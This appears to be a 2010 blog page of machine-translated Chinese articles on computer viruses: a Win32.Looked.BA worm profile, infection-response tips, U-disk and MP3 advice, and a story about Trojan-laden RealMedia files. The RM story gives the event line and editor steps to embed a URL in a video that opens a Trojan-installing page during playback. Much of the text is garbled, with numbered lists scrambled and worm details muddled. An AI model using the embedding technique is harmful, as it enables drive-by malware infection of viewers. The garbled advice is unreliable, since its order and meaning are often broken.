Thursday, April 1, 2010

Worm virus spread Win32.Looked.BA Introduction

virus security view includes more and the "worm virus Win32.Looked.BA disseminate information" related articles, for this introduction to the article is still relatively large number of, if you think this article is the wrong place, or you have a unique perspective, you are welcome to express their views to the computer knowledge and recommendations of the Forum.



1. Do not e-mail attachments to run freely, especially in English e-mail.



Win32.Looked.BA worm features











worm infected files Win32.Looked.BA is a kind of worm, spread via network shares. It could also generate a DLL file used to periodically download and run arbitrary files. This will seriously damage the worm, he can steal all your system passwords to your system, causing immeasurable loss. Article Jiuji brief you Win32.Looked.BA infected with the worm theory, as well as preventive measures:







run-time, Win32.Looked.BA copied to the% Windows% \ Logo1_.exe and% Windows% \ rundl132.exe, then run the% Windows% \ rundl132.exe.





popularity: China



"wxiu.com" prompts us



3. proposed enterprise-level users Gateway products.



Win32.Looked.BA worm Description

Win32.Looked.BA is a kind of worm infected files, spread through the network share. It could also generate a DLL file used to periodically download and run arbitrary files.



attention to the timely closure of useless shared directory, such as the need to share, should be set share permissions. For the system account, should be set relatively strong password, you can avoid viruses easily guess the password function scored system.





4. Close shared directory and set a strong password for the administrator account, do not set the administrator password is empty or too simple passwords.



not arbitrarily run the exe file.



against Win32.Looked.BA worm recommended



Virus Name: Win32.Looked.BA < / p>

crazy: Low



Worm virus spread Win32.Looked.BA Introduction


destructive: China









2. The best time to upgrade the virus code base.

Computer virus was the correct approach to

application skills view includes more and "computer virus in the correct approach" related articles, for this introduction to the article is still relatively large number of, if you think this article is the wrong place, or you have a unique perspective, you are welcome to express their views to the computer knowledge and recommendations of the Forum. If you like to learn computer knowledge, please keep in mind the only site domain name





Internet, the movement of a variety of the virus in the non-stop, as a computer connected to the network, even though we have done a variety of precautions, but still can not be avoided, would have got a little inattentive. And now we have learned mostly how to prevent poisoning the computer knowledge, but who already poisoned the computer how to deal with is poorly understood. Here we will brief you on poisoning emergency measures.

one, do not restart
Generally speaking, when you find that unusual process of unknown program is running, or the computer is running significantly slower pace, and even the regular IE asked whether to run some ActiveX controls, debugging scripts and so on. Well, this time that this time you may have poisoned.
poisoning many people feel that the first thing to do first thing is to restart the computer. In fact, this is extremely wrong. When your computer after poisoning, if the restart, then the most likely result in greater losses.

2, Li-urgent disconnected from the network
because the virus attacks, not only to slow down the computer, but also destroy the data on the hard disk, but also may be send out your personal information, viruses, etc., so that further harm. In this regard, was found poisoned, the first thing to do is disconnect the network.
methods are more disconnected from the network, the simplest way is to go to a computer behind the allocation of the net line, which is the most simply way. However, in practical applications, we do not need such trouble, after all, went to the computer behind it is quite annoying of God. If you install a firewall, the firewall can be disconnected from the network directly, without a firewall, you can right-click "My Network Places" icon in the pop-up menu, select "Properties\; Local Area Connection "and will set it to" Disable "option. If it is dial-up users, you only need to disconnect the dial-up connection or the device can be shut down Moden.

3, back up important files
poisoning is not to conduct an immediate anti-virus, I personally feel that if the computer is not important document, then does not matter how operations are , up to I formatted the hard disk completely re-install. However, if the computer in the preservation of important data, mail, documents, you should be disconnected from the network immediately after its backup to other devices, such as mobile hard disk, CD-ROM. Despite efforts to back up these files may contain viruses, but antivirus software to check narcotics than will be removed much better.
What's more, after the virus attack is likely to not enter the system, so back up important files a timely manner after poisoning is to reduce the loss of one of the most important way.







Computer virus was the correct approach to


4, comprehensive anti-virus
In the absence of a worry, we can carry out the killing of the virus. Killing should include two parts, one in the Windows system under a comprehensive anti-virus, and second, under the antivirus in the DOS. At present, the mainstream anti-virus software in general can be directly under DOS antivirus disk production. In the anti-virus, it is recommended the user first, the need for antivirus software settings. Such as scanning compressed package files, scanning e-mail, while handling the file that contains the virus, for example, it can be set to "clear the virus," or "isolation" rather than a direct "Delete Files" This was done to prevent important documents were removed because of misuse.

5, change the key information set
due to viruses, Trojan horses are often in order to steal personal information for the purpose of the user, thus carrying out a comprehensive anti-virus operation must be followed by some important personal information, such as QQ, Email account password reset. Especially after the killing found a Trojan horse, especially the need for this work.

6, check the My Network Places
If it is LAN user, in dealing with their own computer virus, but also check whether other computers on the network, also was infected with a virus. Because many viruses will attack after the other computers to the network to launch attacks. Their own computer virus is most likely to infect other computers on the network. If you do not timely manner of its liquidation, then the most likely to re-reverse transmission.
check method on each computer in addition to a comprehensive virus removal, you can also install a firewall such viruses Jinshan net dart, if there are other computers on the network with a virus, then the virus will not stop the firewall to block attacks , we only need to open their interception logs, which can be an IP address that sent the virus database, according to re-identify the IP address of computer, in accordance with the above-mentioned methods can be handled.

Computer Beginners should follow the principle of anti-virus

First, the concept of establishing the right of anti-virus, learning about the virus and anti-virus knowledge.















10 are generally not to use the floppy disk to start. If the computer from the hard disk, do not use floppy disks, because it is caused by infection of the hard disk boot sector virus.



Computer Beginners should follow the principle of anti-virus


2 is not easily download the software online. In particular, not to those from unknown web site to download free software, because they can not guarantee that the software had not been infected.



Third, do not use pirated software.



13 is to rebuild the hard disk partition, to reduce losses. If the hard drive information has been damaged, do not rush to format, because the virus can not be in a short time destroy all the hard data, it can make use of "reconstruction" process analysis and reconstruction.





7 is regularly make backups. To cultivate the habit of backing up important files.



8 is to produce a non-toxic system floppy disk. Production of a non-toxic system disk, be write-protected and properly maintained so that emergency.







5 is to use the new equipment and new software prior to inspection.







12 is the discovery of suspicious circumstances and timely information for assistance.



now the computer is a part of people's lives, whether at work or a pastime, most can not do without computers, but computer viruses is also our greatest headache. At home, playing games, surfing the Internet, send and receive e-mail are likely to become infected. Readers may want to ask a friend, then how can we make your computer from viruses, or to minimize loss to, under normal circumstances, I recommend that readers follow the following principles friends before they occur. To minimize the dangers of computer viruses.





6 is the use of anti-virus software. Time to upgrade anti-virus software for the library, open the virus real-time monitoring.



9 is to produce an emergency disk / rescue disk / recovery disk. In accordance with the requirements of anti-virus software, create an emergency disk / rescue disk / recovery disk, in order to restore the system Ji Yong. In the emergency disk / rescue disk / recovery disk to store important information about the system data, such as the hard disk master boot sector information, the boot sector information, CMOS device information, etc., as well as DOS system, COMMAND.COM and two hidden files.



Fourth, it should not use someone else's floppy disk or CD-ROM. Special plate special plane as far as possible.





11 is the attention to the computer with no abnormal symptoms.







virus security view includes more and "computer beginners should follow the principle of anti-virus," related articles, for this introduction to the article is still relatively large number of, if you think of this article there is the wrong place, or you have a unique perspective, you are welcome to express their views to the computer knowledge and recommendations of the Forum.

National Computer Center found that U disk killer virus, new variant of

According to the experts advise, have been infected with the variant of the computer users should immediately upgrade the system in the anti-virus software, to conduct a comprehensive anti-virus. Is not infected with the variant of the computer users need to open the system, anti-virus software "system monitor" feature, from the registry, system processes, memory, network and other aspects of the various operations to active defense, so you can monitor the first time unknown virus invasion of activities to achieve full protection of computer system security purposes.



In addition, subscribers use a mobile hard disk, U disk medium such as a good idea to anti-virus. At the same time, it is best to disable the automatic playback system, prevent the virus from the use of U disk, mobile hard disk, MP3 and other mobile storage devices invasion of infected computer's operating system.





virus security view includes more and the "National Computer Center found that U disk killer virus, new variant of" related articles, for the introduction of this article is quite many. If you like to learn computer knowledge, please keep in mind the only site domain name



National Computer Center found that U disk killer virus, new variant of






the same time, an infected variant would modify the relevant registry key entry system, leading to the operating system can not properly display system hidden files, display the executable file extensions, or even to prohibit the system burner software , media player software and running processes such as Bluetooth devices.



experts say that in addition to the succession of earlier variants of the worm through the U disk and other removable storage devices, communication and other characteristics, he also has a stronger self-protection and some other new features. Variant running, it will copy itself onto the infected computer's operating system under the system directory, and multiple folders in the directory to generate a different executable virus file. Variants also create a "system Recycle Bin" folder attributes and its own copy of the copy into it and hide.



In addition, the variants will continue with the infected system to the root directory of all disk partitions write variants of the main program files and configuration files, once a computer user clicks on any drive letter, it will start to run the variant. This variant will also start by modifying the system registry entries, allowing variants with the computer system which automatically starts to run.





China National Computer Virus Emergency Response Center to monitor the Internet through the discovery, the recent worms "U disk killer" new variant, to remind users to take precautions.

Wednesday, March 31, 2010

RM file, the Trojan how to do

RM file, the Trojan how to do?

51 during the overcrowded everywhere, I still chooses to stay home to spend not less than seven days is not long holiday, in fact, and I have a lot of people have the same arrangement, such as Jia Jia MM is the case. In order to alleviate the pressure of work some time ago, and she intends to stay quietly at home which did not go, prepare for and survive with a variety of large, are so-called "517 days music, at home happy."
51 just two days, on the third day woke up early in the morning, I suddenly received a MM Jia Jia calls for help. "East-yu brother, I would like to give you something to discuss at noon today I ask you to eat right? "This sentence makes lying in bed, I thought I was dreaming, and even pinch a few of their own. "Is Hong Menyan! Need to know before I invite her to dinner, have refused to compliment to the place, today actually invited me to dinner, there must be some demand for me. "Right on cue, at dinner time, Jia Jia, MM said he might have fallen into the system, Trojan horses and let him help us to see.
eating mouth is short, there is no way home after dinner I went to MM. Having carefully reviewed the process of the system and found a suspicious "iexplore.exe" process. "This is not IE browser, do the process, I do not run ah, how does such a process? "My heart has thrown doubt," It seems that your system must be in some kind of Trojan horses, IE browser, it is called. "
" In addition to these days, I downloaded three movies, nothing to download ah! "MM says. So I have three films, it was discovered Unexpectedly, which has some strange link. Trojan appears to be in a web page, this simple, find the page, then solve the problem, clear out the system in the Trojan horse.
"to see several of his films will be in the Trojan horse? "Jia Jia MM asked, puzzled. "You do not say that only RealPlayer player, users will do in the Trojan horse? I use MPC, but ah, how has the Trojans out? "I had to explain:" In the past, only RealPlayer player, can be in the web page Trojans, but now the invasion of ways with each passing day is simply impossible to defend ah. Today, just empty, so you can show off, to see how the intruder RM file to add malicious code. , "done all that as soon as hands-on demonstration to the MM.
reproduce RM Trojan Hoax
"As the RM file is the most commonly used on the network, one of the multimedia file types, so this way the spread of Trojan Web page that allows users face even more endangered Wide . In fact, this method was first used in communication networks advertising, but now has been an intruder used, and to the general RM files to your page links to Trojan operations are not complicated, with some ready-made tools can be completed, such as Helix Producer Plus, RealMedia Editor. "I give an introduction to the MM.
"First of all to prepare a RM video file as a Trojan the spread of pages of raw materials, the best there are some attractive elements, or the victim would not have to watch the Trojan is triggered that time period. There is also an advantage is that, when a user relish the time to watch movies is not going to care about the pop-up pages. "I have to add a bit.
I first open the Notepad program, create a text file, enter the following in the above section of code, and then save it as mm.txt:
u 00:00:20.0 00:00:30.0 & & ; _rpexternal & & http://www.cpcw.com/test.htm
me explain the meaning of this code. Where u is the event flags (Flag), said to be inserted in the document is a URL address. Then the third field represents the starting and ending point in time, the unit format is "hours: minutes: seconds. Ms\Open the URL, rather than using the default browser to open Realplayer embedded URL. Here that when the players to the first 20 seconds or to drag the playback progress of the first 20-30 seconds, when at any time between, RM files will automatically call the system default browser to open "http://www.cpcw.com/ test.htm "link to this page, which will install Trojan programs to the user's system.
Then I run the RM video files, editing tools RealMedia Editor, click on "File" menu under "Open the Real Media file" command to open a previously prepared that part of the normal RM video files, and then click the & ldquo ; Tools "menu under the" merger event "command, select the text file that you just saved. Finally, click "File" menu under the "RealMedia File Save As" command, it would be saved as a new RM file, so that a Trojan horse to bring the web page document produced by RM.

for MM Weapon
For this malicious RM files to prevent, different situations can be used in different ways. For those who can download to your hard drive in the RM file, we can be called a "Real media filter" software on the suspicious RM file handling, which may contain some of the web links and special effects plus removal of out. Run "Real media filter" in the "source document" and "Save As" option to the appropriate settings, and then click "Start Filtering" button you can remove the suspicious RM file redundant links (Figure 2). Filtration is complete, the program will pop up a dialog box and prompts filter content.
In addition, if the user using MPC to play, you can decode the Real media file type is set to DirectShow can be, since the use of DirectShow format can be automatically screened out these ads. But since RM file is the company's exclusive Real format, so DirectShow format for some special RM files can not be decoded. Then only use the RealMedia format player, but the ads feature will automatically shield failure.
finally reminded lovely MM, in time to the Microsoft website to download the latest security patches to plug the loopholes in the system and software; install the latest anti-virus software and update virus database; install the network firewall, blocking does not require port, and the process of trying to connect to the Internet to conduct careful screening.

Hackers attacked the remote to send data, so that frequent computer crashes, then how to solve

Hackers attacked the remote to send data, so that frequent computer crashes, then how to solve?

A: The approach is: immediately disconnect the network. For dial-up Internet users, to immediately stop hackers offline connection; while LAN users, as long connected to the Internet, always liable to be attacked, the general should install personal firewall, just click the firewall " disconnected from the network "button, you can connect immediately stop hackers.

while off the network, should immediately press the "Ctrl + Alt + Del" key combination to check whether the system is running any suspicious process, once found, they should immediately stop it.
then they need to run antivirus software to remove. To prevent virus attacks, many users have installed on your computer anti-virus software, as long as the time to upgrade, these anti-virus software can remove most of the existing Trojan.

MP3 face threat how to do

MP3 face threat how to do

today's digital products is becoming increasingly popular, which will gradually attract more attention of virus writers, and perhaps pass on all elated songs are also infected with many viruses, the virus develop good habits if the virus would not be crazy spread.

we use the MP3 player in the process, it is often necessary to MP3 and computer connections after the file copy, this MP3 player is very prone to virus infections, we should from the following aspects years for prevention.

1. Open the write-protect switch

If the MP3 player with a write-protect switch, and do not write files to the device, preferably in front of the computer connected to the write-protect open switch, so cut off from the source of virus transmission.

2. Install anti-virus software for mobile

now more well-known antivirus manufacturers have introduced specifically for MP3, flash memory and mobile hard drives used in mobile devices such as antivirus software. Of course, mobile anti-virus software installed, we must promptly update the virus database, so as to provide against possible trouble.

3. to manually change the contents of the directory

If your MP3 player, there is no write-protect switch, but also there is no mobile version of antivirus software, then there is a relatively simple way to prevent the virus from invasion. MP3 player in the root directory of the following tools for manually via Notepad to create a name for the "Autorun.inf" file, so a number of viruses in the future will not be able to go to the root directory of the following MP3 player automatically generated "Autorun.inf" file, and can not carry out the illegal distribution of MP3 players. Similarly, the anti-virus method is also applicable for mobile hard disk. This method can prevent the majority of low-level viruses, but if you encounter high-level hackers write viruses, then the application of other methods antivirus.

4. a virus then the application-specific software to format

Even these measures, and sometimes can not be completely avoided infection MP3 phenomenon. Our MP3 infected with virus how to do? Then we must note that in the absence of virus before treatment, do not connect the MP3 to a different computer to use, because that may cause cross-infection, the spread of the virus to further expand the scope of .

at this time we have to do is to format the MP3 player deal, in the format of the process, paying particular attention to choose the correct file format. In addition to the extent possible use of the supplied formatting program (usually a random CD or a manufacturer's official Web site are provided), or may occur after the MP3 format can not be normal use issues.

virus security view includes more and "MP3 encountered threat how to do" related articles, for this introduction to the article is quite many. If you like to learn computer knowledge, please keep in mind the only site domain name